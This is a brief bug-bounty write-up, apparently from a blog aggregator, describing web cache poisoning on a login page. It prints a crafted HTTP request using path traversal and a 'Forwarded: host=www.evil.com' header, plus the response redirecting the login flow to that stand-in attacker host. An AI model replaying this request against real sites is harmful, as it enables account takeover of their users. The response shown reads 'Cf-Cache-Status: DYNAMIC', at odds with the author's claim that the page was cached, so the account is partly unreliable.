Web Cache Poisoing leads to ATO (Account takeover)

9 months ago 53
BOOK THIS SPACE FOR AD
ARTICLE AD

HooS

On the company’s Login page, a simple but very vulnerable page, I started by looking at the responses and noticed that the CDN (Cloudflare) was returning a cached page in the JS files and other paths. (Behavior expected)

I started by trying simple injections like SQL injections but nothing.

I did some fuzzing to see if I could find other endpoints but nothing.

I tried injecting the Host header but nothing, I tried the most common ones: X-Forwarded-For, X-Forwarded-Host until I tried a very ignored header but with great potential…

Forwarded: host=www.evil.com

But this only works with a few endpoints or static files.

Normal path: https://domain.com/authorize?scope=email+openid+offline_access&response_type=code&client_id=portal&state=4cTz0KNymQOl&redirect_uri=https%3A%2F%2Fdomain.com%2Frf%2Fapi%2Fv1%2Flogin_callback

I had an idea!! 💡

If it works in static files… I thought about changing the path by trying to manipulate the CDN so that it serves the login page as a cache.

I add ../../ and .js as query string

GET /authorize/web/cache/../../?scope=email+openid+offline_access&response_type=code&client_id=portal&state=4cTz0KNymQOl&redirect_uri=https%3A%2F%2Fdomain.com%2Frf%2Fapi%2Fv1%2Flogin_callback?file=main.js HTTP/2
Host: domain.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: open
Forwarded: host=www.evil.com

BOOM!! I got it!!

HTTP/2 302 Found
Date: Thu, 04 Jan 2024 22:27:56 GMT
Content-Type: text/html;charset=utf-8
Location: https://www.evil.com/login?request_id=izFLjYifnn3k4Iqn4S90DbPO4BON_v6vTQlj-ujKuHHuz44mUtrAhOXVPJ5CCLiKkCS2TXLxVk2ZaFFkva7yNrGOyXIPgLdsKyMPeecuqVI7K4Mu4B7Lfx-qaQjFaOf7JgWZWyplLGX5s27Kn-qEz15_rIHN8sKhblyPLKnNHhJ4ozzdNTGDjMLB-Ql1IgbgMI1CoSPLH62cfWSQxinnvVM0qTFp1GhYg1hnstFCiH75SIe9jcS3QlPkiQJWBzdkWTOEPK4GyDVMZmAno-daoLgEi6YoUL4kPLXZULEeyuBD2g4km8BHnRG_eX9RykymhqzCEvFmMNl9U7OfMqj1TceRkONTb0lpUnQaKVEPpXf2xP_VqRNsGcaco6dgcjB3mke4E2yRvOifa0abLoLiGA
Set-Cookie: AWSALB=xPdLIdLILn5vMo124en5H7EjbGNqkZra+QH3X5lR0mJHGiGgXc5v/5x0JuLq+3nwJ94x20XQoGWs2A6agiozfe6b25U8kdOTlcJqOngFFj8oDPL5OB3uRt7gGlu8; Expires=Thu, 11 Jan 2024 22:27:56 GMT; Path=/
Cf-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
Set-Cookie: AWSALBCORS=xPdLIdLILn5vMo124en5H7EjbGNqkZra+QH3X5lR0mJHGiGgXc5v/5x0JuLq+3nwJ94x20XQoGWs2A6agiozfe6b25U8kdOTlcJqOngFFj8oDPL5OB3uRt7gGlu8; Expires=Thu, 11 Jan 2024 22:27:56 GMT; Path=/; SameSite=None; Secure
Set-Cookie: _cfuvid=Hu1dYVlVnD8OkIgR0Jqr._O5HD9jAt8u.AMGJVrQYIk-1704407276621-0-604800000; path=/; domain=.evil.com; HttpOnly
Server: cloudflare
Cf-Ray: 8406e9663ef303b2-LIS

Now when I go to the login page, the page has cached!!

Test everything. However insignificant it may seem, it may not be.

Photo by Elisha Terada on Unsplash

I know it was a simple and brief post, it’s the first time I’ve written posts. :)

Read Entire Article